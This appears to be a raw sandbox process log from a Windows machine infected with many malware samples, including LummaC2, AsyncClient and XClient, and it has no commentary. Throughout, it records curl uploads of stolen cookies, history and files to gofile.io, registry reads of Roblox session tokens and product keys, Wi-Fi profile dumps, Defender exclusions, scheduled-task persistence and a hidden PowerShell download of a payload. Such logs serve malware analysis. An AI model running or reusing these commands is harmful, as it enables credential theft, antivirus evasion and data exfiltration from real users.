C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\elshcmw0\elshcmw0.cmdline"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7502.tmp" "c:\Users\Admin\AppData\Local\Temp\elshcmw0\CSC31DB2BB7496F410EABB08B34CCA1F31B.TMP"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\VipToolMeta.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\VipToolMeta.exe"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe
"C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A2F2E84C68F849DA022261FEA98F23E7 C
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe" & rd /s /q "C:\ProgramData\AECAECFCAAEB" & exit
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding BA52B7C8813C1EA74300800309F5AC18
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI8290.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240813437 2 CustomActions!CustomActions.CustomActions.StartApp
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe
"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI89A6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240814562 8 CustomActions!CustomActions.CustomActions.InstallPing
C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupInitialize.xltm" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Desktop/BackupInitialize.xltm" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 9100"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\taskkill.exe
taskkill /F /PID 9100
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 9100"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 9100
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupShow.dxf" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Desktop/BackupShow.dxf" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19562\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\AddxZ.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI19562\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI19562\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\AddxZ.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'freedom.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows.exe'
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\t.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\t.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe'
C:\Users\Admin\Desktop\4363463463464363463463463\Files\jgesfyhjsefa.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\jgesfyhjsefa.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\XSploitLauncher.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\XSploitLauncher.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC2.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC2.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\s.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\s.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Wave.exe'
C:\Users\Admin\Desktop\4363463463464363463463463\Files\mtbkkesfthae.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\mtbkkesfthae.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\4363463463464363463463463\Files\jgesfyhjsefa.exe" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Wave.exe'
C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Posing Posing.cmd && Posing.cmd
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Wave" /tr "C:\Users\Admin\AppData\Roaming\Wave.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.bing.com/search?q=northern+hawk-owl&form=hpcapt&filters=HpDate%3a"20241214_0800"&pc=W000
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe28146f8,0x7fffe2814708,0x7fffe2814718
C:\Users\Admin\Desktop\4363463463464363463463463\Files\svchost.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\svchost.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\hbfgjhhesfd.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\hbfgjhhesfd.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\neptuno.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\neptuno.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\VmManagedSetup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\VmManagedSetup.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\ssg.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\ssg.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\4363463463464363463463463\Files\hbfgjhhesfd.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Users\Admin\AppData\Local\Temp\1986110042.exe
C:\Users\Admin\AppData\Local\Temp\1986110042.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\xx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\xx.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\cx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cx.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AsyncClient.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AsyncClient.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe"
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vvv.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vvv.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6428 -ip 6428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 152
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 835450
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Winston + ..\Southwest + ..\W l
C:\Users\Admin\AppData\Local\Temp\835450\Mineral.com
Mineral.com l
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SecureNet Innovations Ltd\NovaGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url" & exit
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe
"C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe"
C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe
"C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\njSilent.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\njSilent.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\langla.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\langla.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip' -CompressionLevel Optimal
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA739.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'
C:\Windows\svchost.exe
"C:\Windows\svchost.exe"
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\http.exe
"C:\Users\Admin\AppData\Roaming\http.exe"
C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\609587\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\609587\RegAsm.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\connect.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\connect.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzureConnect.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzureConnect.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Javvvum.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Javvvum.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\archive.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffe9dd46f8,0x7fffe9dd4708,0x7fffe9dd4718
